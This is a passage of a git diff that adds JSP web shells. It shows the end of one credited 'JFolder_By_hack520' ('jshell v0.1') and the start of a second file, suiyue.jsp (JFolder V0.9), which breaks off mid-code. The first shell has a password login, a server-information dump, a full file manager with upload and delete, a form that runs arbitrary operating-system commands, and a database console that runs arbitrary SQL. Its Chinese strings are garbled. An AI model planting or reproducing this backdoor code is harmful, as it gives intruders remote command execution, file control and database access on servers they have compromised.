+    throw new JshellConfigException("��չ��ֻ������ĸ���ֺ��»��ߵ����");
+   }
+   
+   if (i != textFileTypes.length - 1)
+    fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
+   else
+    fileTypes += "\"" + textFileTypes[i] + "\"";
+  }
+  
+  for (i = 0; i < _textFileTypes.length; i ++) {
+   if (i != _textFileTypes.length - 1)
+    tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
+   else
+    tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
+  }
+  
+  p = Pattern.compile(tmpFileTypes);
+  m = p.matcher(_jshellContent);
+  
+  if (! m.find()) {
+   throw new JshellConfigException("�����ļ��Ѿ����Ƿ��޸�");
+  }
+  
+  _jshellContent = m.replaceAll(fileTypes);
+  
+  //return HTMLEncode(_jshellContent);
+ }
+ 
+ public String getContent() {
+  return HTMLEncode(_jshellContent);
+ }
+}
+
+class JshellConfigException extends Exception {
+ public JshellConfigException(String message) {
+  super(message);
+ }
+}
+%>
+<html>
+<head>
+<title>JFolder ������ͷ���޸İ�</title>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
+<style>
+body {
+ font-size: 14px;
+ font-family: ����;
+ background-color: #CCCCCC;
+}
+td {
+ font-size: 14px;
+ font-family: ����;
+}
+
+input.textbox {
+ border: black solid 1;
+ font-size: 12px;
+ height: 18px;
+}
+
+input.button {
+ font-size: 12px;
+ font-family: ����;
+ border: black solid 1;
+}
+
+td.datarows {
+ font-size: 14px;
+ font-family: ����;
+ height: 25px;
+}
+
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript">
+<!--
+function ltrim(str) {
+ while (str.indexOf(0) == " ")
+  str = str.substring(1);
+  
+ return str;
+}
+
+function changeAction(obj) {
+ obj.submit();
+}
+//-->
+</script>
+<body>
+<%
+session.setMaxInactiveInterval(_sessionOutTime * 60);
+
+if (request.getParameter("password") == null && session.getAttribute("password") == null) {
+// show the login form
+//================================================================================================
+%>
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:14px;top:200px">
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr>
+      <td class="tr1">
+        <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr>
+            <TD align="left"><FONT face="webdings" color="#ffffff"> 8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>������¼ :::...</b></font></TD>
+            <TD align="right"><FONT color="#d2d8ec"><b>JFolder</b>_By_<b>hack520</b></FONT></TD>
+          </tr>
+            <form name="f1" method="post">
+            <input type="hidden" name="__EVENTTARGET" value="" />
+            <input type="hidden" name="__EVENTARGUMENT" value="" />
+            <input type="hidden" name="__VIEWSTATE" value="dDwtMTQyNDQzOTM1NDt0PDtsPGk8OT47PjtsPHQ8cDxsPGVuY3R5cGU7PjtsPG11bHRpcGFydC9mb3JtLWRhdGE7Pj47bDxpPDE5Pjs+O2w8dDxAMDw7Ozs7Ozs7Ozs7Pjs7Pjs+Pjs+PjtsPE5ld0ZpbGU7TmV3RmlsZTtOZXdEaXJlY3Rvcnk7TmV3RGlyZWN0b3J5O0RCX3JCX01TU1FMO0RCX3JCX01TU1FMO0RCX3JCX0FjY2VzcztEQl9yQl9BY2Nlc3M7Pj7Z5iNIVOaWZWuK0pv8lCMSbhytgQ==" />
+            <script language="javascript" type="text/javascript">
+<!--
+ function __doPostBack(eventTarget, eventArgument) {
+  var theform;
+  if (window.navigator.appName.toLowerCase().indexOf("microsoft") > -1) {
+   theform = document.Form1;
+  }
+  else {
+   theform = document.forms["Form1"];
+  }
+  theform.__EVENTTARGET.value = eventTarget.split("$").join(":");
+  theform.__EVENTARGUMENT.value = eventArgument;
+  theform.submit();
+ }
+// -->
+</script>
+            <tr>
+              <td height="30" align="center" class="td2" colspan="2">
+                <input name="password" type="password" class="textbox" id="Textbox" />
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
+              </td>
+            </tr>
+          </form>
+      </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+//================================================================================================
+// end of the login form
+} else {
+ String password = null;
+ 
+ if (session.getAttribute("password") == null) {
+  password = (String)request.getParameter("password");
+  
+  if (validate(password) == false) {
+   out.println("<div align=\"center\"><font color=\"red\"><li>��ѽ����ù����!</font></div>");
+   out.close();
+   return;
+  }
+  
+  session.setAttribute("password", password);
+ } else {
+  password = (String)session.getAttribute("password");
+ }
+ 
+ String action = null;
+ 
+
+ if (request.getParameter("action") == null)
+  action = "main";
+ else 
+  action = (String)request.getParameter("action");
+  
+ if (action.equals("exit")) {
+  session.removeAttribute("password");
+  response.sendRedirect(request.getRequestURI());
+  out.close();
+  return;
+ }
+
+// show the main menu
+//====================================================================================
+%>
+<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
+ <form name="form1" method="get">
+ <tr bgcolor="#CCCCCC">
+  <td id="title"><!--[������ҳ]--></td>
+  <td align="right">
+   <select name="action" onChange="javascript:changeAction(document.form1)">
+    <option value="main">������ҳ</option>
+    <option value="filesystem">�ļ�ϵͳ</option>
+    <option value="command">ϵͳ����</option>
+    <option value="database">���ݿ�</option>
+    <option value="config">��������</option>
+    <option value="about">���ڳ���</option>
+    <option value="exit">�˳�����</option>
+   </select>
+<script language="JavaScript">
+<%
+ out.println("var action = \"" + action + "\"");
+%>
+var sAction = document.form1.action;
+for (var i = 0; i < sAction.length; i ++) {
+ if (sAction[i].value == action) {
+  sAction[i].selected = true;
+  //title.innerHTML = "[" + sAction[i].innerHTML + "]";
+ }
+}
+</script>
+  </td>
+ </tr>
+ </form>
+</table>
+<%
+//=====================================================================================
+// end of main menu
+
+ if (action.equals("main")) {
+// print the system info table
+//=======================================================================================
+%>
+<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
+ <tr bgcolor="#FFFFFF">
+  <td colspan="2" align="center">��������Ϣ</td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">��������</td>
+  <td align="center" class="datarows"><%=request.getServerName()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">�������˿�</td>
+  <td align="center" class="datarows"><%=request.getServerPort()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">����ϵͳ</td>
+  <td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">��ǰ�û���</td>
+  <td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">��ǰ�û�Ŀ¼</td>
+  <td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">��ǰ�û�����Ŀ¼</td>
+  <td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">�������·��</td>
+  <td align="center" class="datarows"><%=request.getRequestURI()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">�������·��</td>
+  <td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">������</td>
+  <td align="center" class="datarows"><%=request.getProtocol()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">�����������汾��Ϣ</td>
+  <td align="center" class="datarows"><%=application.getServerInfo()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JDK�汾</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.version")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JDK��װ·��</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.home")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JAVA������汾</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JAVA�������</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JAVA��·��</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JAVA���������·��</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JAVA��ʱĿ¼</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">JIT��������</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">��չĿ¼·��</td>
+  <td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td colspan="2" align="center">�ͻ�����Ϣ</td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">�ͻ�����ַ</td>
+  <td align="center" class="datarows"><%=request.getRemoteAddr()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">���������</td>
+  <td align="center" class="datarows"><%=request.getRemoteHost()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">�û���</td>
+  <td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">����ʽ</td>
+  <td align="center" class="datarows"><%=request.getScheme()%></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center" class="datarows">Ӧ�ð�ȫ�׽��ֲ�</td>
+  <td align="center" class="datarows"><%=request.isSecure() == true ? "��" : "��"%></td>
+ </tr>
+</table>
+<%
+//=======================================================================================
+// end of printing the system info table
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("filesystem")) {
+  String curPath = "";
+  String result = "";
+  String fsAction = "";
+  
+  if (request.getParameter("curPath") == null) {
+   curPath = request.getRealPath(request.getServletPath());
+   curPath = pathConvert((new File(curPath)).getParent());
+  } else {
+   curPath = Unicode2GB((String)request.getParameter("curPath"));
+  }
+  
+  if (request.getParameter("fsAction") == null) {
+   fsAction = "list";
+  } else {
+   fsAction = (String)request.getParameter("fsAction");
+  }
+  
+  if (fsAction.equals("list"))
+   result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
+  else if (fsAction.equals("browse")) {
+   result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
+   result += browseFile(curPath);
+  }
+  else if (fsAction.equals("open"))
+   result = openFile(curPath, request.getRequestURI() + "?action=" + action);
+  else if (fsAction.equals("save")) {
+   if (request.getParameter("fileContent") == null) {
+    result = "<font color=\"red\">ҳ�浼������</font>";
+   } else {
+    String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
+    result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+   }
+  } else if (fsAction.equals("createFolder")) {
+   if (request.getParameter("folderName") == null) {
+    result = "<font color=\"red\">Ŀ¼������Ϊ��</font>";
+   } else {
+    String folderName = Unicode2GB(request.getParameter("folderName").trim());
+    if (folderName.equals("")) {
+     result = "<font color=\"red\">Ŀ¼������Ϊ��</font>"; 
+    } else {
+     result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
+    }
+   }
+  } else if (fsAction.equals("createFile")) {
+   if (request.getParameter("fileName") == null) {
+    result = "<font color=\"red\">�ļ�������Ϊ��</font>";
+   } else {
+    String fileName = Unicode2GB(request.getParameter("fileName").trim());
+    if (fileName.equals("")) {
+     result = "<font color=\"red\">�ļ�������Ϊ��</font>";
+    } else {
+     result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
+    }
+   }
+  } else if (fsAction.equals("deleteFile")) {
+   if (request.getParameter("filesDelete") == null) {
+    result = "<font color=\"red\">û��ѡ��Ҫɾ�����ļ�</font>";
+   } else {
+    String[] files2Delete = (String[])request.getParameterValues("filesDelete");
+    if (files2Delete.length == 0) {
+     result = "<font color=\"red\">û��ѡ��Ҫɾ�����ļ�</font>";
+    } else {
+     for (int n = 0; n < files2Delete.length; n ++) {
+      files2Delete[n] = Unicode2GB(files2Delete[n]);
+     }
+     result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
+    }
+   }
+  } else if (fsAction.equals("saveAs")) {
+   if (request.getParameter("fileContent") == null) {
+    result = "<font color=\"red\">ҳ�浼������</font>";
+   } else {
+    String fileContent = Unicode2GB(request.getParameter("fileContent"));
+    result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+   }
+  } else if (fsAction.equals("upload")) {
+   result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
+  } else if (fsAction.equals("copyto")) {
+   if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
+    result = "<font color=\"red\">û��ѡ��Ҫ���Ƶ��ļ�</font>";
+   } else {
+    String[] files2Copy = request.getParameterValues("filesDelete");
+    String dstPath = request.getParameter("dstPath").trim();
+    if (files2Copy.length == 0) {
+     result = "<font color=\"red\">û��ѡ��Ҫ���Ƶ��ļ�</font>";
+    } else if (dstPath.equals("")) {
+     result = "<font color=\"red\">û����дҪ���Ƶ���Ŀ¼·��</font>";
+    } else {
+     for (int i = 0; i < files2Copy.length; i ++)
+      files2Copy[i] = Unicode2GB(files2Copy[i]);
+     
+     result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
+    }
+   }
+  } else if (fsAction.equals("rename")) {
+   if (request.getParameter("fileRename") == null) {
+    result = "<font color=\"red\">ҳ�浼������</font>";
+   } else {
+    String file2Rename = request.getParameter("fileRename").trim();
+    String newName = request.getParameter("newName").trim();
+    if (file2Rename.equals("")) {
+     result = "<font color=\"red\">û��ѡ��Ҫ���������ļ�</font>";
+    } else if (newName.equals("")) {
+     result = "<font color=\"red\">û����д���ļ���</font>";
+    } else {
+     result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
+    }   
+   }
+  }
+%>
+<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
+ <form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>">
+ <tr bgcolor="#FFFFFF">
+  <td align="center">��ַ  <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" />
+            <input type="submit" value="ת��" class="button" /></td>
+ </tr>
+ </form>
+ <tr bgcolor="#FFFFFF">
+  <td><%= result.trim().equals("")?"&nbsp;" : result%></td>
+ </tr>
+</table>
+<%  
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("command")) {
+  String cmd = "";
+  InputStream ins = null;
+  String result = "";
+  
+  if (request.getParameter("command") != null) {  
+   cmd = (String)request.getParameter("command");
+   result = exeCmd(cmd);
+  }
+// print the command form
+//========================================================================================
+%>
+<table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center">
+ <form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>">
+ <tr bgcolor="#FFFFFF">
+  <td align="center">ִ������</td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">
+   <input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" />
+   <input type="submit" class="button" value="ִ��" />
+  </td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">ִ�н��</td>
+ </tr>
+ </form>
+</table>
+<table align="center" width="600" border="0">
+ <tr>
+  <td><%=result == "" ? "&nbsp;" : result%></td>
+ </tr>
+</table>
+<%
+//=========================================================================================
+// end of printing command form
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("database")) {
+  String dbAction = "";
+  String result = "";
+  String dbType = "";
+  String dbServer = "";
+  String dbPort = "";
+  String dbUsername = "";
+  String dbPassword = "";
+  String dbName = "";
+  String dbResult = "";
+  String sql = "";
+  
+  if (request.getParameter("dbAction") == null) {
+   dbAction = "main";
+  } else {
+   dbAction = request.getParameter("dbAction").trim();
+   if (dbAction.equals(""))
+    dbAction = "main";
+  }
+  
+  if (dbAction.equals("main")) {
+   result = "&nbsp;";
+  } else if (dbAction.equals("dbConnect")) {
+   if (request.getParameter("dbType") == null ||
+    request.getParameter("dbServer") == null ||
+    request.getParameter("dbPort") == null ||
+    request.getParameter("dbUsername") == null ||
+    request.getParameter("dbPassword") == null ||
+    request.getParameter("dbName") == null) {
+    response.sendRedirect(request.getRequestURI() + "?action=" + action);
+   } else {
+    dbType = request.getParameter("dbType").trim();
+    dbServer = request.getParameter("dbServer").trim();
+    dbPort = request.getParameter("dbPort").trim();
+    dbUsername = request.getParameter("dbUsername").trim();
+    dbPassword = request.getParameter("dbPassword").trim();
+    dbName = request.getParameter("dbName").trim();
+    
+    if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
+     if (DBConnect(dbUsername, dbPassword)) {
+      if (request.getParameter("sql") != null) {
+       sql = request.getParameter("sql").trim();
+       if (! sql.equals("")) {
+        dbResult = DBExecute(sql);
+       }
+      }
+      
+      result =  "<script language=\"javascript\">\n";
+      result += "<!--\n";
+      result += "function exeSql() {\n";
+      result += "    if (ltrim(document.dbInfo.sql.value) != \"\")\n";
+      result += "        document.dbInfo.submit();";
+      result += "}\n";
+      result += "\n";
+      result += "function resetIt() {\n";
+      result += "    document.dbInfo.sql.value = \"\";";
+      result += "}\n";
+      result += "//-->\n";
+      result += "</script>\n";
+      result += "sql���<br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" onclick=\"javascript:exeSql()\" value=\"ִ��\"/>&nbsp;<input type=\"reset\" class=\"button\" onclick=\"javascript:resetIt()\" value=\"���\"/>\n";
+      
+      DBRelease();
+     } else {
+      result = "<font color=\"red\">���ݿ�����ʧ��</font>";
+     }
+    } else {
+     result = "<font color=\"red\">���ݿ���������û���ҵ�</font>";
+    }    
+   }
+  }
+%>
+<script language="javascript">
+<!--
+<%
+out.println("var selectedType = \"" + dbType + "\";");
+%>
+//-->
+</script>
+<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
+ <form name="dbInfo" method="post" action="<%=request.getRequestURI() + "?action=" + action + "&dbAction=dbConnect"%>">
+ <tr bgcolor="#FFFFFF">
+  <td width="300" align="center">���ݿ���������</td>
+  <td align="center">
+   <select name="dbType">
+    <option value="sqlserver">SQLServer���ݿ�</option>
+    <option value="mysql">MySql���ݿ�</option>
+    <option value="oracle">Oracle���ݿ�</option>
+    <option value="db2">DB2���ݿ�</option>
+    <option value="odbc">ODBC����Դ</option>
+   </select>
+   <script language="javascript">
+   for (var i = 0; i < document.dbInfo.dbType.options.length; i ++) {
+    if (document.dbInfo.dbType.options[i].value == selectedType) {
+     document.dbInfo.dbType.options[i].selected = true;
+    }
+   }
+   </script>
+  </td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">���ݿ��������ַ</td>
+  <td align="center"><input type="text" name="dbServer" class="textbox" value="<%=dbServer%>" style="width:150px;" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">���ݿ�������˿�</td>
+  <td align="center"><input type="text" name="dbPort" class="textbox" value="<%=dbPort%>" style="width:150px;" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">���ݿ��û���</td>
+  <td align="center"><input type="text" name="dbUsername" class="textbox" value="<%=dbUsername%>" size="20" style="width:150px;" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">���ݿ�����</td>
+  <td align="center"><input type="password" name="dbPassword" class="textbox" value="<%=dbPassword%>" size="20" style="width:150px;" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">���ݿ���</td>
+  <td align="center"><input type="text" name="dbName" class="textbox" value="<%=dbName%>" size="20" style="width:150px;" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center" colspan="2"><input type="submit" value="����" class="button" /> <input type="reset" value="����" class="button" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center" colspan="2"><%=result%></td>
+ </tr>
+ </form>
+</table>
+<table align="center" width="100%" border="0">
+ <tr>
+  <td align="center">
+   <%=dbResult%>
+  </td>
+ </tr>
+</table>
+<%  
+
+////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////  
+ } else if (action.equals("config")) {
+  String cfAction = "";
+  int i;
+  
+  if (request.getParameter("cfAction") == null) {
+
+   cfAction = "main";
+  } else {
+   cfAction = request.getParameter("cfAction").trim();
+   if (cfAction.equals(""))
+    cfAction = "main";
+  }
+  
+  if (cfAction.equals("main")) {
+// start of config form
+//==========================================================================================
+%>
+<script language="javascript">
+<!--
+function delFileType() {
+ document.config.newType.value = document.config.textFileTypes[document.config.textFileTypes.selectedIndex].value;
+ document.config.textFileTypes.options.remove(document.config.textFileTypes.selectedIndex);
+}
+
+function addFileType() {
+ if (document.config.newType.value != "") {
+  var oOption = document.createElement("OPTION");
+  document.config.textFileTypes.options.add(oOption);
+  oOption.value = document.config.newType.value;
+  oOption.innerHTML = document.config.newType.value;
+ }
+}
+
+function selectAllTypes() {
+ for (var i = 0; i < document.config.textFileTypes.options.length; i ++) {
+  document.config.textFileTypes.options[i].selected = true;
+ }
+}
+//-->
+</script>
+<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
+ <form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" onSubmit="javascript:selectAllTypes()">
+ <tr bgcolor="#FFFFFF">
+  <td align="center" width="200">����</td>
+  <td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">ϵͳ����</td>
+  <td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">Session��ʱʱ��</td>
+  <td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center">�ɱ༭�ļ�����</td>
+  <td>
+   <table border="0" width="190" cellpadding="0" cellspacing="0">
+    <tr>
+     <td>
+      <input type="text" size="11" class="textbox" name="newType" />
+     </td>
+     <td align="center">
+      <input type="button" onClick="javascript:delFileType()" value="<<" class="button" />
+      <p></p>
+      <input type="button" value=">>" onClick="javascript:addFileType()" class="button" />
+     </td>
+     <td align="right"> 
+      <select name="textFileTypes" size="4" style="width: 87px" multiple="true">  
+<%
+  for (i = 0; i < _textFileTypes.length; i ++) {
+%>
+       <option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option>
+<%
+   }
+%>
+      </select>
+     </td>
+    </tr>
+   </table>
+  </td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td align="center" colspan="2"><input type="submit" value="����" class="button" /></td>
+ </tr>
+ </form>
+</table>
+<%
+  } else if (cfAction.equals("save")) {
+   if (request.getParameter("password") == null || 
+    request.getParameter("encode") == null || 
+    request.getParameter("sessionTime") == null ||
+    request.getParameterValues("textFileTypes") == null) {
+    response.sendRedirect(request.getRequestURI());
+   }
+   
+   String result = "";
+   
+   String newPassword = request.getParameter("password").trim();
+   String newEncodeType = request.getParameter("encode").trim();
+   String newSessionTime = request.getParameter("sessionTime").trim();
+   String[] newTextFileTypes = request.getParameterValues("textFileTypes");
+   String jshellPath = request.getRealPath(request.getServletPath());
+   
+   try {
+    JshellConfig jconfig = new JshellConfig(jshellPath);
+    jconfig.setPassword(newPassword);
+    jconfig.setEncodeType(newEncodeType);
+    jconfig.setSessionTime(newSessionTime);
+    jconfig.setTextFileTypes(newTextFileTypes);
+    jconfig.save();
+    result += "���ñ���ɹ������ڷ��أ����Ժ򡭡�";
+    result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">";
+   } catch (JshellConfigException e) {
+    result = "<font color=\"red\">" + e.getMessage() + "</font>"; 
+   }
+
+%>
+<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
+ <tr bgcolor="#FFFFFF">
+  <td><%=result == "" ? "&nbsp;" : result%></td>
+ </tr>
+</table>
+<%
+  }
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+//==========================================================================================
+// end of config form
+ } else if (action.equals("about")) {
+// start of about
+//==========================================================================================
+%>
+<table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
+ <tr bgcolor="#FFFFFF">
+  <td align="center">jshell v0.1 �� </td>
+ </tr>
+ <tr bgcolor="#FFFFFF">
+  <td>   ----��������-��Ȩ----------------������̿͡�-����</td>
+ </tr>
+</table>
+<% 
+//==========================================================================================
+ }
+}
+%>
+</body>
+</html>
+   
\ No newline at end of file
diff --git a/jsp/suiyue.jsp b/jsp/suiyue.jsp
new file mode 100644
index 0000000..1c63947
--- /dev/null
+++ b/jsp/suiyue.jsp
@@ -0,0 +1,993 @@
+<%
+/**
+JFolder V0.9  windows platform
+@Filename�� JFolder.jsp 
+@Description�� һ���򵥵�ϵͳ�ļ�Ŀ¼��ʾ������������Դ���������ṩ�������ļ��������������ܽ�����
+
+@Bugs  :  ����ʱ�������ļ����޷�������ʾ123456789
+*/
+%>
+<%@ page contentType="text/html;charset=gb2312"%>
+<%@page import="java.io.*,java.util.*,java.net.*" %>
+<%!
+private final static int languageNo=0; //���԰汾��0 : ���ģ� 1��Ӣ��
+String strThisFile="JFolder.jsp";
+String[] authorInfo={" <font color=red> ����-��Ȩ������̿�-������ </font>"," <font color=red> Thanks for your support - - by Syue http://www.syue.com </font>"};
+String[] strFileManage   = {"�� �� �� ��","File Management"};
+String[] strCommand      = {"CMD �� ��","Command Window"};
+String[] strSysProperty  = {"ϵ ͳ �� ��","System Property"};
+String[] strHelp         = {"�� ��","Help"};
+String[] strParentFolder = {"�ϼ�Ŀ¼","Parent Folder"};
+String[] strCurrentFolder= {"��ǰĿ¼","Current Folder"};
+String[] strDrivers      = {"������","Drivers"};
+String[] strFileName     = {"�ļ�����","File Name"};
+String[] strFileSize     = {"�ļ���С","File Size"};
+String[] strLastModified = {"����޸�","Last Modified"};
+String[] strFileOperation= {"�ļ�����","Operations"};
+String[] strFileEdit     = {"�޸�","Edit"};
+String[] strFileDown     = {"����","Download"};
+String[] strFileCopy     = {"����","Move"};
+String[] strFileDel      = {"ɾ��","Delete"};
+String[] strExecute      = {"ִ��","Execute"};
+String[] strBack         = {"����","Back"};
+String[] strFileSave     = {"����","Save"};
+
+public class FileHandler
+{
+ private String strAction="";
+ private String strFile="";
+ void FileHandler(String action,String f)
+ {
+ 
+ }
+}
+
+public static class UploadMonitor {
+
+  static Hashtable uploadTable = new Hashtable();
+
+  static void set(String fName, UplInfo info) {
+   uploadTable.put(fName, info);
+  }
+
+  static void remove(String fName) {
+   uploadTable.remove(fName);
+  }
+
+  static UplInfo getInfo(String fName) {
+   UplInfo info = (UplInfo) uploadTable.get(fName);
+   return info;
+  }
+}
+
+public class UplInfo {
+
+  public long totalSize;
+  public long currSize;
+  public long starttime;
+  public boolean aborted;
+
+  public UplInfo() {
+   totalSize = 0l;
+   currSize = 0l;
+   starttime = System.currentTimeMillis();
+   aborted = false;
+  }
+
+  public UplInfo(int size) {
+   totalSize = size;
+   currSize = 0;
+   starttime = System.currentTimeMillis();
+   aborted = false;
+  }
+
+  public String getUprate() {
+   long time = System.currentTimeMillis() - starttime;
+   if (time != 0) {
+    long uprate = currSize * 1000 / time;
+    return convertFileSize(uprate) + "/s";
+   }
+   else return "n/a";
+  }
+
+  public int getPercent() {
+   if (totalSize == 0) return 0;
+   else return (int) (currSize * 100 / totalSize);
+  }
+
+  public String getTimeElapsed() {
+   long time = (System.currentTimeMillis() - starttime) / 1000l;
+   if (time - 60l >= 0){
+    if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+    else return time / 60 + ":0" + (time % 60) + "m";
+   }
+   else return time<10 ? "0" + time + "s": time + "s";
+  }
+
+  public String getTimeEstimated() {
+   if (currSize == 0) return "n/a";
+   long time = System.currentTimeMillis() - starttime;
+   time = totalSize * time / currSize;
+   time /= 1000l;
+   if (time - 60l >= 0){
+    if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+    else return time / 60 + ":0" + (time % 60) + "m";
+   }
